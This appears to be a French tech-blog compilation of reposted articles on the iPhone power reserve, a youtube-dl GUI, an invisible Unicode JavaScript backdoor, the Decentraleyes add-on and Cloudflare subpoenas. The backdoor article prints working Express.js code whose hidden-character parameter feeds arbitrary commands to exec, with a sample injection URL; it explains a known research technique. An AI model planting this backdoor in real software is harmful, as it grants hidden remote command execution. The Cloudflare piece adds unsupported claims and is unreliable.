Même à plat, ton iPhone a une petite réserve d’énergie pour te dépanner

Publié le 5 janvier 2022 par Jean-Marc Meyrat

Zut, plus de batterie. C’est la catastrophe ! Un iPhone à plat, c’est tout un attirail qui disparait.

Plus d’appareil photo, de GPS, de téléphone, ni même de carte de transport, voire de clés. À moins que…

Depuis quelques générations, les iPhone intègrent une « réserve d’énergie » qui fait perdurer une poignée de fonctions quand la batterie est vide. Voici comment cette réserve méconnue peut te dépanner.

Une réserve depuis les iPhone XS/XR

La réserve d’énergie a fait son apparition sur les iPhone XS et XR sortis en 2018 et est depuis intégrée à chaque modèle, y compris l’iPhone SE de 2e génération. Toutes les gammes suivantes en bénéficient donc:

• iPhone XS;
• iPhone XR;
• iPhone SE 2e génération;
• iPhone 11;
• iPhone 12;
• iPhone 13.

Apple a ajouté cette nouveauté de manière très discrète, en ne communiquant quasiment pas dessus au début. Il fallait se rendre sur la fiche technique des iPhone XS/XR pour voir la mention « Cartes Express avec réserve d’énergie » sans plus d’information.

Les démontages n’ont pas débusqué de petite batterie supplémentaire dans les iPhone, la réserve d’énergie est constituée dans la batterie principale. C’est comme la réserve d’une voiture : il n’y a pas de second réservoir dans lequel on aurait mis une petite quantité de carburant, il s’agit toujours du réservoir principal dans lequel on fixe une limite à partir de laquelle le carburant restant est considéré comme la réserve.

Alors qu’ils ont pourtant la même batterie, l’iPhone 8 n’a pas de réserve d’énergie tandis que l’iPhone SE 2020 en a une. Qu’est-ce qui les différencie dès lors? Le système sur puce, certes (un A13 au lieu d’un A11), mais c’est peut-être le contrôleur NFC qui fait surtout la différence. Depuis le modèle NXP PN7120 (100VB27) apparu dans l’iPhone XS, le contrôleur NFC de l’iPhone a une unité de gestion de l’énergie qui lui permet de se connecter directement à la batterie et d’avoir des modes de fonctionnement autonomes quand l’appareil est éteint, ce que n’avaient apparemment pas les précédents.

Une réserve pour terminer son trajet

Si Apple est demeurée discrète sur cette nouveauté dans les premiers temps, c’est sûrement parce que son rôle restait très limité. La réserve d’énergie servait initialement à deux fonctions: les cartes de transport et les cartes d’étudiant enregistrées dans Wallet. Ces deux types de cartes ont un point commun: on peut s’en servir sans avoir à ouvrir une app ni même déverrouiller l’appareil, il suffit d’approcher son iPhone du lecteur NFC pour valider son titre de transport ou son identité. C’est ce qu’Apple appelle le mode « express ».

Au Japon, l’iPhone est un pass de transports en commun simple comme bonjour

Imagine, tu voyages au Japon, à Londres ou dans une autre zone où le mode Transport express est pris en charge. À force de prendre des photos et d’utiliser Plans, ton iPhone tombe en rade de batterie plus vite que prévu. Es-tu condamné à acheter un ticket de métro à un distributeur avec du liquide? Non.

Grâce à la réserve d’énergie de ton iPhone, tu peux continuer d’utiliser ta carte de Transport express (Suica ou Pasmo au Japon, une carte Apple Pay sélectionnée comme carte de Transport express à Londres). L’iPhone apparait comme complètement à plat, il est impossible de le rallumer, mais la carte de transport fonctionne bien pendant encore un petit moment. Seule une icône de batterie rouge accompagnée d’un bref message indique que des cartes restent utilisables.

La réserve d’énergie n’est pas pensée pour que tu traverses le Japon d’un bout à l’autre avec ton iPhone éteint, elle est uniquement là pour dépanner. D’après Apple, elle permet de prolonger la disponibilité des cartes express jusqu’à cinq heures, un laps de temps suffisant pour terminer son trajet et partir à la recherche d’un chargeur.

Une réserve pour ouvrir les portes

À la faveur de la prise en charge de clés numériques dans l’app Wallet (renommée « Cartes » en français) dans iOS 15, Apple parle plus volontiers de « mode Express » que de « Transport express ». Ces clés de voiture, de maison ou d’hôtel fonctionnent en effet rien qu’en approchant son iPhone de la serrure connectée, de manière « express » donc. Et comme les cartes de transport, les clés stockées dans Wallet continuent de jouer leur rôle quand l’iPhone bascule sur sa réserve d’énergie.

Même avec un iPhone à sec, on a encore une chance de pouvoir rentrer dans sa chambre d’hôtel au petit matin. Inutile de dire que cette réserve va devenir une roue de secours de plus en plus primordiale à mesure que l’on stockera davantage de clés et de cartes dans son iPhone.

Le sursis offert par la réserve d’énergie est commun à tous les types de cartes ou de clés configurées en mode Express : jusqu’à cinq heures. En appuyant sur le bouton latéral de l’iPhone, on peut s’assurer que la réserve d’énergie nous secourt, mais Apple prévient que l’utilisation répétée de ce bouton peut considérablement réduire la réserve disponible. Mieux vaut ne pas en abuser.

Autre précision importante à connaître : le mode Express fonctionne sur la réserve uniquement quand l’iPhone n’a plus de batterie. Si tu éteins toi-même ton iPhone (pour préserver la batterie justement), la réserve ne sera pas exploitée pour les cartes et les clés de Wallet. Pourquoi? Peut-être par mesure de sécurité et sûrement pour garder de l’énergie pour la nouvelle fonction introduite dans iOS 15.

Localise ton iPhone même éteint

Depuis iOS 15 en effet, même s’il est éteint, ton iPhone continue à communiquer avec les autres appareils du réseau Localiser afin de te permettre de le retrouver. À l’inverse des cartes en mode Express, cela fonctionne même si tu éteins toi-même ton iPhone… ou qu’un voleur l’éteint à ta place.

Cette fonction a justement été pensée pour ce cas de figure, et elle marche, comme l’a témoigné récemment un lecteur qui a pu retrouver, avec l’aide de la police, son iPhone volé qui avait été éteint.

Comment le réseau Localiser a pu aider la police à retrouver un iPhone volé

Cette nouveauté requiert au minimum un iPhone 11, car elle exploite la puce U1 Ultra Wideband. L’iPhone peut communiquer avec le réseau Localiser jusqu’à 24 heures après une extinction manuelle ou bien (c’est une nouveauté d’iOS 15.2) jusqu’à 5 heures quand il est en mode Réserve, autrement dit après qu’il se soit éteint tout seul.

Après les cartes de transport, quelques pass, les clés et la localisation, d’autres fonctions deviendront-elles disponibles même lorsque les iPhone semblent dormir?

Source: iGénération

 

 

Une super interface pour Youtube-DL

@Korben  —  6 janvier 2022

Si après avoir lu mon formidable article sur la maîtrise de YouTube-dl, vous ne vous en sortez toujours pas, il vous faut une interface graphique !

Et bonne nouvelle, Open Video Downloader est là pour vous servir. Ce logiciel open source qui fonctionne sous macOS, Linux et Windows (car Electron JS ftw) vous permettra de télécharger simplement des vidéos en provenance de YouTube, mais également Vimeo, Twitter et j’en passe.

Il utilise bien sûr Youtube-DL et permet de récupérer soit des vidéos seules, soit carrément des playlists voire l’ensemble du contenu d’une chaine.

Vous pouvez choisir la résolution dans laquelle vous voulez la vidéo, uniquement le son si vous voulez et choper également des vidéos privées grâce au support des cookies.

La GUI est capable de télécharger jusqu’à 32 vidéos en simultanée et comme YouTube DL évolue très vite (car c’est le jeu du chat et de la souris avec les plateformes), et bien Open Video Downloader le mettra à jour automatiquement.

Vous trouverez Open Video Downloader ici.

 

REF.:   https://korben.info/youtubedl-interface.html?fbclid=IwAR0drIU_o5JGVOdJnIQY-xC_Yt8sTclQP8SwoRiM7kZ-Lp33GuJAdff6wnY

 

 

Une backdoor invisible en JavaScript

@Korben  —  8 janvier 2022

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

 

REF.:   https://korben.info/backdoor-invisible-javascript.html

 

Decentraleyes,un add-on de Firefox ,Chrome,contre le pîstage:

Decentraleyes par Thomas Rientjes

Recommandé

Protège du pistage lié aux diffuseurs de contenus « gratuits », centralisés. Accélère de nombreuses requêtes (Google Hosted Libraries et autres) en les servant localement, allégeant la charge des sites. Complète les bloqueurs de contenus habituels.

 Les sites web dépendent de plus en plus de bibliothèques tierces pour proposer du contenu. En général, annuler les requêtes pour les publicités ou traqueurs ne pose pas de problèmes. Cependant, bloquer le véritable contenu casse évidemment les pages. L'objectif de cet add-on est de supprimer l'intermédiaire en proposant à la vitesse de l'éclair la livraison de fichiers (regroupés) en local afin d'améliorer la protection des données personnelles en ligne.

     • Protège la confidentialité en contournant les diffuseurs de contenus prétendant offrir des services gratuits.
     • Complète les bloqueurs connus tels que uBlock origin (recommandé), Adblock Plus et autres.
     • Fonctionne directement tel quel ne nécessitant aucune configuration préalable.

Remarque: Decentraleyes n'est pas une panacée mais il empêche de nombreux sites de vous contraindre à l'envoi de telles requêtes. Il est possible aussi d'indiquer à Decentraleyes de bloquer les requêtes manquantes.

   > Présentation plus simple: https://git.synz.io/Synzvato/decentraleyes/wikis/Simple-Introduction

Suis-je actuellement protégé ?

Un vérificateur indique si vous êtes correctement protégé. C'est la méthode conseillée et la plus rapide pour savoir si l'add-on est installé, activé et correctement configuré.

   > Lien vers ce vérificateur: https://decentraleyes.org/test

 Adguard,pour ceux qui le connaisse, ne bloque pas le CDN. Vous aurez peut-être besoin de l'extension Decentraleyes dans le navigateur Firefox et la boutique en ligne Chrome pour bloquer le CDN. Decentraleyes pour le navigateur Firefox par Thomas Rientjes Recommandé Vous protège contre le traçage grâce à la livraison de contenu "gratuit" et centralisé. Il empêche de nombreuses demandes d'atteindre des réseaux tels que les bibliothèques hébergées par Google et sert des fichiers locaux pour empêcher les sites de se briser. Complète les bloqueurs de contenu habituels. Protège la confidentialité en évitant les grands réseaux de distribution qui prétendent offrir des services gratuits. • Complète les bloqueurs réguliers tels que uBlock Origin (recommandé), Adblock Plus, et al. • Fonctionne directement hors de la boîte ; absolument aucune configuration préalable requise. Remarque : Decentraleyes n'est pas une solution miracle, mais cela empêche de nombreux sites Web de vous faire envoyer ce genre de demandes. En fin de compte, vous pouvez également faire en sorte que Decentraleyes bloque les demandes pour toutes les ressources CDN manquantes.

REF.:   https://addons.mozilla.org/fr/firefox/addon/decentraleyes/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search

https://chrome.google.com/webstore/detail/decentraleyes/ldpochfccmkkmhdbclfhpagapcfdljkj

Cloudflare fait appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs» ....Hackers :

 

Cloudflare fait  appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs» ....Hackers :

 Des assignations à comparaître ciblant plus de 35 000 noms de domaine de clients Cloudflare en six mois,du déja vu ;-) 

 

Alors beaucoup de nerds emploi d'autres outils pour y parvenir,comme:

 https://www.robtex.com/

 https://urlscan.io/

 https://ipsnoop.com/34.147.109.202 (exemple)

Ces outils vont vous révéler sur quel sites le hackers a enregistrés son site web frauduleux, souvent le site disparaît assez vites  ;-)

 

 Cloudflare ne supprime rien en réponse aux avis de retrait DMCA, à moins qu'il ne stocke le contenu de manière permanente sur son réseau. 

Cependant, la société remettra les données personnelles des clients aux titulaires de droits d'auteur qui obtiennent une citation à comparaître DMCA. Au cours du premier semestre 2021, des citations à comparaître civiles ont ciblé des centaines de clients liés à plus de 35 000 domaines. 

 logo cloudflare

 Service de protection CDN et DDoS populaire Cloudflare a subi de nombreuses pressions de la part des titulaires de droits d'auteur ces dernières années. L'entreprise propose ses services à des millions de sites. Cela inclut les multinationales, les gouvernements, mais aussi certains des principaux sites pirates au monde. Tous les titulaires de droits ne sont pas satisfaits de ce dernier.

 Certains ont accusé Cloudflare de faciliter la violation du droit d'auteur en continuant à fournir l'accès à ces plateformes. Dans le même temps, ils font appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs». Cloudflare voit les choses différemment. 

L'entreprise se positionne comme un fournisseur de services neutre qui n'héberge aucun contenu illicite. Ils ne font que transmettre des informations qui sont temporairement mises en cache sur ses services.(souvent des faussetés). 

Demandes de suppression et de blocage

 Auparavant, les tribunaux avaient ordonné à Cloudflare de bloquer des sites spécifiques, mais aucune nouvelle ordonnance n'est intervenue au cours du premier semestre de l'année dernière(sinon Cloudflare serait en faillite car il coopère aux piéage des hackers avec les services de l'états,un Honeypot légal ). La société a répondu à plusieurs demandes de retrait DMCA. Dans ces cas, le contenu signalé est stocké sur le réseau de Cloudflare. Ces demandes régulières de retrait DMCA ont ciblé 32 comptes et 367 noms de domaine au cours de la période de référence. Il s'agit d'une augmentation significative par rapport à l'année précédente où 4 comptes et 4 noms de domaine avaient été impactés. Domaines ciblés par des avis DMCA réguliers dmca Outre les problèmes de droits d'auteur, Cloudflare répond également à d'autres demandes d'application, notamment les ordres de piégeage et de commerce et les mandats de perquisition(c'est là où est situé la cryptomonnaie,les attaques XSS,les malwares,etc...). Ceux-ci ont également augmenté au fil des ans. 

Ces augmentations ne sont pas vraiment inattendues car Cloudflare a considérablement développé son activité, explique la société. « Bien qu'il y ait eu une augmentation constante du nombre de demandes d'application de la loi depuis notre premier rapport de transparence en 2013, cela est dû en partie à l'augmentation exponentielle du nombre de domaines clients Cloudflare au cours de cette période. » 

Une copie du rapport de transparence complet de Cloudflare est disponible sur le site officiel de la société.(mais c'est seulement du papier sans volonté)

 

Nota: Un CDN c'est, un réseau de diffusion de contenu (RDC) ou en anglais content delivery network (CDN) est constitué d’ordinateurs reliés en réseau à travers Internet et qui coopèrent afin de mettre à disposition du contenu ou des données à des utilisateurs.

Ce réseau est constitué :

• de serveurs d'origine, d'où les contenus sont « injectés » dans le RDC pour y être répliqués ;
• de serveurs périphériques, typiquement déployés à plusieurs endroits géographiquement distincts, où les contenus des serveurs d'origine sont répliqués ;
• d'un mécanisme de routage permettant à une requête utilisateur sur un contenu d'être servie par le serveur le « plus proche », dans le but d’optimiser le mécanisme de transmission / livraison.

Les serveurs (ou nœuds) sont généralement connectés à Internet à travers différentes dorsales Internet.

L’optimisation peut se traduire par la réduction des coûts de bande passante, l’amélioration de l’expérience utilisateur (réduction de la latence), voire les deux.

Le nombre de nœuds et de serveurs qui constituent un RDC varie selon les choix d’architecture, certains pouvant atteindre plusieurs milliers de nœuds et des dizaines de milliers de serveurs.

REF.:   https://torrentfreak.com/subpoenas-targeted-over-35000-cloudflare-customer-domain-names-in-six-months-220109/